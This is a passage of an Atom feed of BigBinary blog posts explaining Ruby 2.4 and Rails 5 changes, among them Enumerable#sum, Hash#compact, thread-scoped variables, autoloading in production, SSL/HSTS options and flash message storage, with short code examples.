'disposable.style.email.with+symbol@example.com'  EMAIL_REGEXP_DEVISE = /\A[^@\s]+@([^@\s]+\.)+[^@\W]+\z/  bench.report('Regexp#===') do    EMAIL_REGEXP_DEVISE === EMAIL_ADDR  end  bench.report('Regexp#=~') do    EMAIL_REGEXP_DEVISE =~ EMAIL_ADDR  end  bench.report('Regexp#match') do    EMAIL_REGEXP_DEVISE.match(EMAIL_ADDR)  end  bench.report('Regexp#match?') do    EMAIL_REGEXP_DEVISE.match?(EMAIL_ADDR)  end  bench.compare!end#=&gt; Warming up --------------------------------------#=&gt;          Regexp#===   103.876k i/100ms#=&gt;           Regexp#=~   105.843k i/100ms#=&gt;        Regexp#match    58.980k i/100ms#=&gt;       Regexp#match?   107.287k i/100ms#=&gt; Calculating -------------------------------------#=&gt;          Regexp#===      1.335M ( 9.5%) i/s -      6.648M in   5.038568s#=&gt;           Regexp#=~      1.369M ( 6.7%) i/s -      6.880M in   5.049481s#=&gt;        Regexp#match    709.152k ( 5.4%) i/s -      3.539M in   5.005514s#=&gt;       Regexp#match?      1.543M ( 4.6%) i/s -      7.725M in   5.018696s#=&gt;#=&gt; Comparison:#=&gt;       Regexp#match?:  1542589.9 i/s#=&gt;           Regexp#=~:  1369421.3 i/s - 1.13x  slower#=&gt;          Regexp#===:  1335450.3 i/s - 1.16x  slower#=&gt;        Regexp#match:   709151.7 i/s - 2.18x  slower</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 implements Enumerable#sum]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-introduces-enumerable-sum"/>
      <updated>2016-11-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-introduces-enumerable-sum</id>
      <content type="html"><![CDATA[<p>It is a common use case to calculate sum of the elements of an array or valuesfrom a hash.</p><pre><code class="language-ruby">[1, 2, 3, 4] =&gt; 10{a: 1, b: 6, c: -3} =&gt; 4</code></pre><p>Active Support already implements<a href="https://github.com/rails/rails/blob/3d716b9e66e334c113c98fb3fc4bcf8a945b93a1/activesupport/lib/active_support/core_ext/enumerable.rb#L2-L27">Enumerable#sum</a></p><pre><code class="language-ruby">&gt; [1, 2, 3, 4].sum #=&gt; 10&gt; {a: 1, b: 6, c: -3}.sum{ |k, v| v**2 } #=&gt; 46&gt; ['foo', 'bar'].sum # concatenation of strings #=&gt; &quot;foobar&quot;&gt; [[1], ['abc'], [6, 'qwe']].sum # concatenation of arrays #=&gt; [1, &quot;abc&quot;, 6, &quot;qwe&quot;]</code></pre><p>Until Ruby 2.3, we had to use Active Support to use <code>Enumerable#sum</code> method orwe could use <code>#inject</code> which is<a href="https://github.com/rails/rails/blob/3d716b9e66e334c113c98fb3fc4bcf8a945b93a1/activesupport/lib/active_support/core_ext/enumerable.rb#L2-L27">used by Active Support under the hood</a>.</p><p>Ruby 2.4.0 implements<a href="https://github.com/ruby/ruby/commit/41ef7ec381338a97d15a6b4b18acd8b426a9ce79">Enumerable#sum</a>as <a href="https://bugs.ruby-lang.org/issues/12217">part of the language</a> itself.</p><p>Let's take a look at how <code>sum</code> method fares on some of the enumerable objects inRuby 2.4.</p><pre><code class="language-ruby">&gt; [1, 2, 3, 4].sum #=&gt; 10&gt; {a: 1, b: 6, c: -3}.sum { |k, v| v**2 } #=&gt; 46&gt; ['foo', 'bar'].sum #=&gt; TypeError: String can't be coerced into Integer&gt; [[1], ['abc'], [6, 'qwe']].sum #=&gt; TypeError: Array can't be coerced into Integer</code></pre><p>As we can see, the behavior of <code>Enumerable#sum</code> from Ruby 2.4 is same as that ofActive Support in case of numbers but not the same in case of string or arrayconcatenation. Let's see what is the difference and how we can make it work inRuby 2.4 as well.</p><h3>Understanding addition/concatenation identity</h3><p>The <code>Enumerable#sum</code> method takes an optional argument which acts as anaccumulator. Both Active Support and Ruby 2.4 accept this argument.</p><p>When identity argument is not passed, <code>0</code> is used as default accumulator in Ruby2.4 whereas Active Support uses <code>nil</code> as default accumulator.</p><p>Hence in the cases of string and array concatenation, the error occurred in Rubybecause the code attempts to add a string and array respectively to <code>0</code>.</p><p>To overcome this, we need to pass proper addition/concatenation identity as anargument to the <code>sum</code> method.</p><p>The addition/concatenation identity of an object can be defined as the valuewith which calling <code>+</code> operation on an object returns the same object.</p><pre><code class="language-ruby">&gt; ['foo', 'bar'].sum('') #=&gt; &quot;foobar&quot;&gt; [[1], ['abc'], [6, 'qwe']].sum([]) #=&gt; [1, &quot;abc&quot;, 6, &quot;qwe&quot;]</code></pre><h3>What about Rails ?</h3><p>As we have seen earlier, Ruby 2.4 implements <code>Enumerable#sum</code> favouring numericoperations whereas also supporting non-numeric callers with the identityelement. This behavior is not entirely same as that of Active Support. But stillActive Support can make use of the native sum method whenever possible. There isalready a <a href="https://github.com/rails/rails/pull/25202">pull request</a> open whichuses <code>Enumerable#sum</code> from Ruby whenever possible. This will help gain someperformance boost as the Ruby's method is implemented natively in C whereas thatin Active Support is implemented in Ruby.</p>]]></content>
    </entry><entry>
       <title><![CDATA[String#concat, Array#concat & String#prepend Ruby 2.4]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/string-array-concat-and-string-prepend-take-multiple-arguments-in-ruby-2-4"/>
      <updated>2016-10-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/string-array-concat-and-string-prepend-take-multiple-arguments-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p>In Ruby, we use <code>#concat</code> to append a string to another string or an element tothe array. We can also use <code>#prepend</code> to add a string at the beginning of astring.</p><h3>Ruby 2.3</h3><h4>String#concat and Array#concat</h4><pre><code class="language-ruby">string = &quot;Good&quot;string.concat(&quot; morning&quot;)#=&gt; &quot;Good morning&quot;array = ['a', 'b', 'c']array.concat(['d'])#=&gt; [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;d&quot;]</code></pre><h4>String#prepend</h4><pre><code class="language-ruby">string = &quot;Morning&quot;string.prepend(&quot;Good &quot;)#=&gt; &quot;Good morning&quot;</code></pre><p>Before Ruby 2.4, we could pass only one argument to these methods. So we couldnot add multiple items in one shot.</p><pre><code class="language-ruby">string = &quot;Good&quot;string.concat(&quot; morning&quot;, &quot; to&quot;, &quot; you&quot;)#=&gt; ArgumentError: wrong number of arguments (given 3, expected 1)</code></pre><h3>Changes with Ruby 2.4</h3><p>In Ruby 2.4, we can pass multiple arguments and Ruby processes each argument oneby one.</p><h4>String#concat and Array#concat</h4><pre><code class="language-ruby">string = &quot;Good&quot;string.concat(&quot; morning&quot;, &quot; to&quot;, &quot; you&quot;)#=&gt; &quot;Good morning to you&quot;array = ['a', 'b']array.concat(['c'], ['d'])#=&gt; [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;d&quot;]</code></pre><h4>String#prepend</h4><pre><code class="language-ruby">string = &quot;you&quot;string.prepend(&quot;Good &quot;, &quot;morning &quot;, &quot;to &quot;)#=&gt; &quot;Good morning to you&quot;</code></pre><p>These methods work even when no argument is passed unlike in previous versionsof Ruby.</p><pre><code class="language-ruby">&quot;Good&quot;.concat#=&gt; &quot;Good&quot;</code></pre><h4>Difference between <code>concat</code> and shovel <code>&lt;&lt;</code> operator</h4><p>Though shovel <code>&lt;&lt;</code> operator can be used interchangeably with <code>concat</code> when weare calling it once, there is a difference in the behavior when calling itmultiple times.</p><pre><code class="language-ruby">str = &quot;Ruby&quot;str &lt;&lt; strstr#=&gt; &quot;RubyRuby&quot;str = &quot;Ruby&quot;str.concat strstr#=&gt; &quot;RubyRuby&quot;str = &quot;Ruby&quot;str &lt;&lt; str &lt;&lt; str#=&gt; &quot;RubyRubyRubyRuby&quot;str = &quot;Ruby&quot;str.concat str, strstr#=&gt; &quot;RubyRubyRuby&quot;</code></pre><p>So <code>concat</code> behaves as appending <code>present</code> content to the caller twice. Whereascalling <code>&lt;&lt;</code> twice is just sequence of binary operations. So the argument forthe second call is output of the first <code>&lt;&lt;</code> operation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Hash#compact and Hash#compact! now part of Ruby 2.4]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/hash-compact-and-hash-compact-now-part-of-ruby-2-4"/>
      <updated>2016-10-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/hash-compact-and-hash-compact-now-part-of-ruby-2-4</id>
      <content type="html"><![CDATA[<p>It is a common use case to remove the <code>nil</code> values from a hash in Ruby.</p><pre><code class="language-ruby">{ &quot;name&quot; =&gt; &quot;prathamesh&quot;, &quot;email&quot; =&gt; nil} =&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }</code></pre><p>Active Support already has a solution for this in the form of<a href="http://api.rubyonrails.org/classes/Hash.html#method-i-compact">Hash#compact</a>and<a href="http://api.rubyonrails.org/classes/Hash.html#method-i-compact-21">Hash#compact!</a>.</p><pre><code class="language-ruby">hash = { &quot;name&quot; =&gt; &quot;prathamesh&quot;, &quot;email&quot; =&gt; nil}hash.compact #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }hash #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot;, &quot;email&quot; =&gt; nil}hash.compact! #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }hash #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }</code></pre><p>Now, Ruby 2.4 will have these 2 methods in the<a href="https://bugs.ruby-lang.org/issues/11818">language</a><a href="https://bugs.ruby-lang.org/issues/12863">itself</a>, so even those not using Railsor Active Support will be able to use them. Additionally it will also giveperformance boost over the Active Support versions because now these methods areimplemented in C natively whereas the Active Support versions are in Ruby.</p><p>There is already a<a href="https://github.com/rails/rails/pull/26868">pull request open</a> in Rails to usethe native versions of these methods from Ruby 2.4 whenever available so that wewill be able to use the performance boost.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 blogs and the art of story telling]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-blogs-and-the-art-of-story-telling"/>
      <updated>2016-09-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-blogs-and-the-art-of-story-telling</id>
      <content type="html"><![CDATA[<p>Between October 31,2015 and Sep 5, 2016 we wrote 80 blogs on changes in<a href="/blog/categories/Rails-5">Rails 5</a>.</p><p>Producing a blog every 4 days consistently over 310 days takes persistence andtime - lots of it.</p><p>We needed to go through all the commits and then pick the ones which are worthwriting about and then write about it. Going into this I knew it would be a hardtask. Ruby on Rails is now a well crafted machine. In order to fully understandwhat's going on in the code base we need to spend sufficient time on it.</p><p>However I was surprised by the thing that turned to be the hardest - tellingstory of the code change.</p><p>Every commit has a story. There is a reason for it. The commit itself might beminor but that code change in itself does not tell the full story.</p><p>For example take<a href="https://github.com/rails/rails/commit/a71350cae0082193ad8c66d65ab62e8bb0b7853b">this commit</a>.This commit is so simple that you might think it is not worth writing about.However in order to fully understand what it does we need to tell the full storywhich was captured in<a href="rails-5-disables-autoloading-after-booting-the-app-in-production">this blog</a>.</p><p>Or take the case of<a href="rails-5-official-supports-mariadb">Rails 5 officially supports MariaDB</a> . Theblog captures the full story and not just the code that changed.</p><p>Now you might say that I have cherry picked blog posts that favor my case. Solet's pick a blog <a href="skip-mailers-while-generating-rails-5-app">which is simple</a>.</p><p>You might wonder what could go wrong with a blog like this. As it turns out,plenty. That's because writing a blog also requires defining the boundary of theblog. Deciding what to include and what to leave out is hard. One gets a feelfor it only after writing it. And after having typed the words on screen,<a href="https://m.signalvnoise.com/the-writing-class-id-like-to-teach-11b259f44a5d#.mk324kxym">pruning is hard</a>.</p><p>A good written article is simple writing. The problem with article which aresimple to readers is that - well it is simple. So it feels to readers thatwriting it must be simple. Nothing can be further from the truth. It takes a lotof hard work to produce anything simple. It's true in writing. And it's true inproducing software.</p><p>Coming back to the &quot;Skipping Mailer&quot; blog, it took quite a bit of back and forthto bring the blog to its essence. So yes the final output is quite short butthat does not mean that it took short amount of time to produce it.</p><h2>Tell a story even if you have 10 seconds</h2><p>John Lasseter was working as an animator at Disney in 1984. He was just firedfrom Disney for promoting computer animations at Disney. Lasseter joinsLucasfilm. Lucasfilm renamed itself to Pixar Graphics Group and sold itself toSteve Jobs for $5 million.</p><p>Lasseter was tasked with producing a short film that would show the power ofwhat computer animations could do so that Pixar Graphics Group can get someprojects like producing TV commercials with cartoon characters and earn somemoney. Lasseter needed to produce a short film for the upcoming computergraphics animation conference.</p><p>His initial idea was to have a short movie having a plotless character. Hepresented this idea to a conference in Brussels. There Belgian animator RaoulServais commented in slightly harsh tone that</p><blockquote><p>No matter how short it is, it should have a beginning, a middle, and an end.Don't forget the story.</p></blockquote><p>Lasseter complained that it's a pretty short movie and there might not be timeto present a story.</p><p>Raoul Servais replied</p><blockquote><p>You can tell a story in ten seconds.</p></blockquote><p>Lasseter started developing a character. He came up with the idea of <em>Luxo Jr.</em></p><p><a href="https://www.youtube.com/watch?v=6G3O60o5U7w">Here is</a> final production of<strong>Luxo Jr.</strong></p><p>Luxo Jr. was a major hit at the conference. Crowd was on its feet in applauseeven before the two minutes film was over. Remember this is 1986 and ComputerAnimation was not much advanced at that time and this was the first movie evermade with the use of just computer graphics.</p><p>Lasseter later said that when audience was watching the movie they forgot thatthey were watching a computer animated film because the story took over them. Helearned the lesson that technology should enable better story telling andtechnology in itself divorced from story telling would not advance the cause ofPixar.</p><p>Later John Lasseter went on to produce hits like Toy Story, A bug's life, ToyStory 2, Cars, Cars 2, Monsters Inc, Finding Nemo and many more.</p><p>So you see even a great John Lasseter had to be reminded to tell a story.</p><h2>Actual content over bullet points</h2><p><a href="https://en.wikipedia.org/wiki/Jeff_Bezos">Jeff Bezos</a> is so focused on knowingthe full story that he banned usage of PowerPoint in internal meetings anddiscussions. As per him it is easy to hide behind bullet points in a PowerPointpresentation.</p><p>He insisted on writing the full story in word document and distribute it tomeeting attendees. The meetings starts with everyone head down reading thedocument.</p><p>He is also known for saying that if we are building a feature then we first needto know how it would be presented to the consumers when it is unveiled. We needto know the story we are going to tell them. Without the story we won't havefull picture of what we are going to build.</p><h2>Learning to tell story is a journey</h2><p>I'm glad that during the last 310 days 16 people contributed to the blog posts.The process of writing the posts at times was frustrating for a bunch of them.They had done the work of digging into the code and had posted their findings.Continuously getting feedback to edit the blog to build a nice coherent storywhere each paragraph is an extension of the previous paragraph is a downer. Somewere dismayed at why we are spending so much energy on a technical blog.</p><p>However in the end we all are happy that we underwent this exercise. We couldsee the initial draft of the blog and the final version and we all could see thedifference.</p><p>By no means we have mastered the art of storytelling. It's a long journey.However we believe we are on the right path. Hopefully in coming months andyears we at BigBinary would be able to bring to you more stories from changes inRails and other places.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Create module and class level variables]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-ability-to-create-module-and-class-level-variables-on-per-thread-basis"/>
      <updated>2016-09-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-ability-to-create-module-and-class-level-variables-on-per-thread-basis</id>
      <content type="html"><![CDATA[<p>Rails already provides methods for creating class level and module levelvariables in the form of<a href="http://guides.rubyonrails.org/active_support_core_extensions.html#cattr-reader-cattr-writer-and-cattr-accessor">cattr** and mattr** suite of methods</a>.</p><p>In Rails 5, we can go a step further and create<a href="https://github.com/rails/rails/pull/22630">thread specific class or module level variables</a>.</p><p>Here is an example which demonstrates an example on how to use it.</p><pre><code class="language-ruby">module CurrentScope  thread_mattr_accessor :user_permissionsendclass ApplicationController &lt; ActionController::Base  before_action :set_permissions  def set_permissions    user = User.find(params[:user_id])    CurrentScope.user_permissions = user.permissions  endend</code></pre><p>Now <code>CurrentScope.user_permissions</code> will be available till the lifetime ofcurrently executing thread and all the code after this point can use thisvariable.</p><p>For example, we can access this variable in any of the models without explicitlypassing <code>current_user</code> from the controller.</p><pre><code class="language-ruby">class BookingsController &lt; ApplicationController  def create    Booking.create(booking_params)  endendclass Booking &lt; ApplicationRecord  validate :check_permissions  private  def check_permissions    unless CurrentScope.user_permissions.include?(:create_booking)      self.errors.add(:base, &quot;Not permitted to allow creation of booking&quot;)    end  endend</code></pre><p>It internally uses<a href="https://ruby-doc.org/core-2.3.0/Thread.html#method-i-5B-5D-3D">Thread.current#[]=</a>method, so all the variables are scoped to the thread currently executing. Itwill also take care of namespacing these variables per class or module so that<code>CurrentScope.user_permissions</code> and <code>RequestScope.user_permissions</code> will notconflict with each other.</p><p>If you have used<a href="http://api.rubyonrails.org/classes/ActiveSupport/PerThreadRegistry.html">PerThreadRegistry</a>before for managing global variables, <code>thread_mattr_*</code> &amp; <code>thread_cattr_*</code>methods can be used in place of it starting from Rails 5.</p><p>Globals are generally bad and should be avoided but this change provides nicerAPI if you want to fiddle with them anyway!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 silences assets logs in dev mode by default]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-silences-assets-logs-in-development-mode-by-default"/>
      <updated>2016-09-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-silences-assets-logs-in-development-mode-by-default</id>
      <content type="html"><![CDATA[<p>As a Rails developer, it was a familiar sign to see assets logs flooding thewhole terminal in development mode.</p><pre><code class="language-plaintext">Started GET &quot;/assets/application.self-4a04ce68c5ebf2d39fba46316802f17d0a73fadc4d2da50a138d7a4bf2d26a84.css?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530Started GET &quot;/assets/bootstrap/transition.self-6ad2488465135ab731a045a8ebbe3ea2fc501aed286042496eda1664fdd07ba9.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530Started GET &quot;/assets/bootstrap/collapse.self-2eb697f62b587bb786ff940d82dd4be88cdeeaf13ca128e3da3850c5fcaec301.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530Started GET &quot;/assets/jquery_ujs.self-e87806d0cf4489aeb1bb7288016024e8de67fd18db693fe026fe3907581e53cd.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530Started GET &quot;/assets/jquery.self-660adc51e0224b731d29f575a6f1ec167ba08ad06ed5deca4f1e8654c135bf4c.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530</code></pre><p>Fortunately, we could include <code>quiet_assets</code> gem in our application. It turnsoff the Rails asset pipeline log in development mode.</p><pre><code class="language-plaintext">Started GET &quot;/assets/application.js&quot; for 127.0.0.1 at 2016-08-28 19:35:34</code></pre><h3>quiet_assets is part of Rails 5</h3><p>Now quiet_assets gem is folded into Rails 5 itself.</p><p>A new configuration <code>config.assets.quiet</code> which when set to <code>true</code>,<a href="https://github.com/rails/sprockets-rails/pull/355">loads a rack middleware named Sprockets::Rails::QuietAssets</a>.This middleware checks whether the current request matches assets prefix pathand if it does, it silences that request.</p><p>This eliminates the need to add external gem for this.</p><p>By default,<a href="https://github.com/rails/rails/pull/25351"><code>config.assets.quiet</code> is set to <code>true</code></a>in development mode. So we don't have to do anything. It just works out of thebox.</p><h3>Compatibility with older versions of Rails</h3><p>This functionality has been backported to sprockets-rails 3.1.0 and is availablein <a href="https://github.com/rails/rails/pull/25397">Rails 4.2.7</a> as well.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 disables autoloading while app in production]]></title>
       <author><name>Shailesh Kalamkar</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-disables-autoloading-after-booting-the-app-in-production"/>
      <updated>2016-08-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-disables-autoloading-after-booting-the-app-in-production</id>
      <content type="html"><![CDATA[<p>This blog requires understanding of what is <code>autoloading</code>. If you are notfamiliar with that then please refer to<a href="http://guides.rubyonrails.org/autoloading_and_reloading_constants.html">Autoloading and Reloading Constants</a>article on Rails Guide.</p><h2>Eagerload paths</h2><p>Autoloading is <a href="https://github.com/rails/rails/issues/13142">not thread-safe</a>and hence we need to make sure that all constants are loaded when applicationboots. The concept of loading all the constants even before they are actuallyneeded is called &quot;Eager loading&quot;. In a way it is opposite of &quot;Autoloading&quot;. Inthe case of &quot;Autoloading&quot; the application does not load the constant until it isneeded. Once a class is needed and it is missing then the application startslooking in &quot;autoloading paths&quot; to load the missing class.</p><p><code>eager_load_paths</code> contains a list of directories. When application boots inproduction then the application loads all constants found in all directorieslisted in <code>eager_load_paths</code>.</p><p>We can add directories to <code>eager_load_paths</code> as shown below.</p><pre><code class="language-ruby"># config/application.rbconfig.eager_load_paths &lt;&lt; Rails.root.join('lib')</code></pre><h2>In Rails 5 autoloading is disabled for production environment by default</h2><p>With<a href="https://github.com/rails/rails/commit/a71350cae0082193ad8c66d65ab62e8bb0b7853b">this commit</a>Rails will no longer do Autoloading in production after it has booted.</p><p>Rails will load all the constants from <code>eager_load_paths</code> but if a constant ismissing then it will not look in <code>autoload_paths</code> and will not attempt to loadthe missing constant.</p><p>This is a breaking change for some applications. For vast majority of theapplications this should not be an issue.</p><p>In the rare situation where our application still needs autoloading in the<code>production</code> environment, we can enable it by setting up<code>enable_dependency_loading</code> to <code>true</code> as follows:</p><pre><code class="language-ruby"># config/application.rbconfig.enable_dependency_loading = trueconfig.autoload_paths &lt;&lt; Rails.root.join('lib')</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds more control to fine tuning SSL usage]]></title>
       <author><name>Srihari K</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-more-control-to-fine-tuning-ssl-usage"/>
      <updated>2016-08-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-more-control-to-fine-tuning-ssl-usage</id>
      <content type="html"><![CDATA[<p>Adding HTTPS support is one of the first steps towards enhancing the security ofa web application.</p><p>Even when a web app is available over <code>https</code>, some users may end up visitingthe <code>http</code> version of the app, losing the security <code>https</code> provides.</p><p>It is important to redirect users to the <code>https</code> URLs whenever possible.</p><h2>Forcing HTTPS in Rails</h2><p>We can force users to use HTTPS by setting <code>config.force_ssl = true</code>.</p><p>If we look at Rails source code, we can see that when we set<code>config.force_ssl = true</code>, a middleware <code>ActionDispatch::SSL</code>, is inserted intoour apps middleware stack :</p><pre><code class="language-ruby">if config.force_sslmiddleware.use ::ActionDispatch::SSL,config.ssl_optionsend</code></pre><p>This middleware, <code>ActionDispatch::SSL</code> is responsible for doing three things :</p><ol><li><p>Redirect all <code>http</code> requests to their <code>https</code> equivalents.</p></li><li><p>Set <code>secure</code> flag on cookies to tell browsers that these cookies must not besent for <code>http</code> requests.</p></li><li><p>Add HSTS headers to response.</p></li></ol><p>Let us go through each of these.</p><h3>Redirect all http requests to their https equivalents</h3><p>In Rails 5, we can configure the behavior of redirection using the <code>redirect</code>key in the <code>config.ssl_options</code> configuration.</p><p>In previous versions of Rails, whenever an <code>http</code> request was redirected to<code>https</code> request, it was done with an HTTP <code>301</code> redirect.</p><p>Browsers cache 301 redirects. When forcing https redirects, if at any point wewant to test the <code>http</code> version of the page, it would be hard to browse it,since the browser would redirect to the <code>https</code> version. Although this is thedesired behavior, this is a pain during testing and deploying.</p><p>Rails 5 lets us<a href="https://github.com/rails/rails/pull/21520">specify the status code for redirection</a>,which can be set to <code>302</code> or <code>307</code> for testing, and later to <code>301</code> when we areready for deployment to production.</p><p>We can specify the options for redirection in Rails 5 as follows :</p><pre><code class="language-ruby">...  config.force_ssl = true  config.ssl_options = {  redirect: { status: 307, port: 81 } }...</code></pre><p>If a redirect status is not specified, requests are redirected with a <code>301</code>status code.</p><p>There is an <a href="https://github.com/rails/rails/pull/23941">upcoming change</a> to makethe status code used for redirecting any non-GET, non-HEAD http requests to<code>307</code> by default.</p><p>Other options accepted by <code>ssl_options</code> under <code>redirect</code> key are <code>host</code> and<code>body</code> .</p><h3>Set secure flags on cookies</h3><p>By setting the <code>Secure</code> flag on a cookie, the application can instruct thebrowser not to send the cookie in clear text. Browsers which support this flagwill send such cookies only through <code>HTTPS</code> connections.</p><p>Setting secure flag on cookies is important to prevent cookie hijacking by<a href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack">man in the middle attacks</a>.</p><p>In case of a &quot;man in the middle&quot; attack, the attacker places oneself between theuser and the server. By doing this, attacker aims to collect cookies which aresent from user to server on every request. However, if we mark the cookies withsensitive information as <code>Secure</code>, those cookies won't be sent on <code>http</code>requests. This ensures that the browser never sends cookies to an attacker whowas impersonating the webserver at an <code>http</code> end point.</p><p>Upon enabling <code>config.force_ssl = true</code>, the <code>ActionDispatch::SSL</code> middlewaresets the <code>Secure</code> flag on all cookies by default.</p><h3>Set HSTS Headers on Responses</h3><p><a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">HSTS</a> or &quot;HTTPStrict Transport Security&quot; is a security enhancement by which applications canspecify themselves as HTTPS-only to complying browsers.</p><p>HSTS capabilities of a browser can be used by sending appropriate responseheaders from the server. When a domain is added to the HSTS list of a browser,the browser redirects to the <code>https</code> version of the URL without the help of theserver.</p><p>Chrome maintains an <a href="https://hstspreload.appspot.com/">HSTS Preload List</a> with alist of domains which are hardcoded into chrome as HTTPS only. This list is alsoused by Firefox and Safari.</p><p>Rails 5 has a configuration flag to set the <code>preload</code> directive in the HSTSheader and can be used as follows :</p><pre><code class="language-ruby">config.ssl_options = { hsts: { preload: true } }</code></pre><p>We can also specify a <code>max-age</code> for the HSTS header.</p><p>Rails 5 by default sets the <code>max-age</code> of HSTS header to 180 days, which isconsidered as the lower bound by<a href="https://www.ssllabs.com/ssltest">SSL Labs SSL Test</a> . This period is alsoabove the 18 week requirement for HSTS <code>max-age</code> mandated for inclusion inbrowser preload list.</p><p>We can specify a custom max-age by :</p><pre><code class="language-ruby">  config.ssl_options = { hsts: { expires: 10.days } }</code></pre><p>In Rails 5, if we disable HSTS by setting :</p><pre><code class="language-ruby">config.ssl_options = { hsts: false }</code></pre><p>Rails 5 will set the value of expires header to 0, so that browsers immediatelystop treating the domain as HTTPS-only.</p><p>With custom redirect status and greater control over the HSTS header, Rails 5lets us roll out <code>HTTPS</code> in a controlled manner, and makes rolling back of thesechanges easier.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Discard some flash messages to trim storage]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-trims-session-storage-by-discarding-some-flash-messages"/>
      <updated>2016-08-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-trims-session-storage-by-discarding-some-flash-messages</id>
      <content type="html"><![CDATA[<p>Rails, by default, stores session data in cookies.</p><p>The cookies have a storage limit of 4K and cookie overflow exception is raisedif we attempt to store more than 4K of data in it.</p><h3>Cookie overflow issue with Rails 4.x</h3><p>Flash messages are persisted across requests with the help of session storage.</p><p>Flash messages like <code>flash.now</code> are marked as discarded for next request. So, onnext request, it gets deleted before reconstituting the values.</p><p>This unnecessary storage of discarded flash messages leads to more consumptionof data in the cookie store. When the data exceeds 4K limit, Rails throws<code>ActionDispatch::Cookies::CookieOverflow</code>.</p><p>Let us see an example below to demonstrate this.</p><pre><code class="language-ruby">class TemplatesController &lt; ApplicationControllerdef search@templates = Template.search(params[:search])flash.now[:notice] = &quot;Your search results for #{params[:search]}&quot;flash[:alert] = &quot;Alert message&quot;p session[:flash]endend#logs{&quot;discard&quot;=&gt;[&quot;notice&quot;],&quot;flashes&quot;=&gt;{&quot;notice&quot;=&gt;&quot;Your search results for #{Value of search params}&quot;,&quot;alert&quot;=&gt;&quot;Alert message&quot;}}</code></pre><p>In the above example, it might be possible that <code>params[:search]</code> is largeamount of data and it causes Rails to raise <code>CookieOverflow</code> as the sessionpersists both <code>flash.now[:notice]</code> and <code>flash[:alert]</code> .</p><h3>Rails 5 removes discarded flash messages</h3><p>In Rails 5,<a href="https://github.com/rails/rails/pull/18721">discarded flash messages are removed</a>before persisting into the session leading to less consumption of space andhence, fewer chances of <code>CookieOverflow</code> being raised.</p><pre><code class="language-ruby">class TemplatesController &lt; ApplicationControllerdef search@templates = Template.search(params[:search], params[:template])flash.now[:notice] = &quot;Your search results for #{params[:search]} with template #{params[:template]}&quot;flash[:alert] = &quot;Alert message&quot;p session[:flash]endend#logs{&quot;discard&quot;=&gt;[], &quot;flashes&quot;=&gt;{&quot;alert&quot;=&gt;&quot;Alert message&quot;}}</code></pre><p>We can see from above example, that <code>flash.now</code> value is not added in session inRails 5 leading to less chances of raising<code>ActionDispatch::Cookies::CookieOverflow</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 deprecates alias_method_chain]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-deprecates-alias-method-chain"/>
      <updated>2016-08-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-deprecates-alias-method-chain</id>
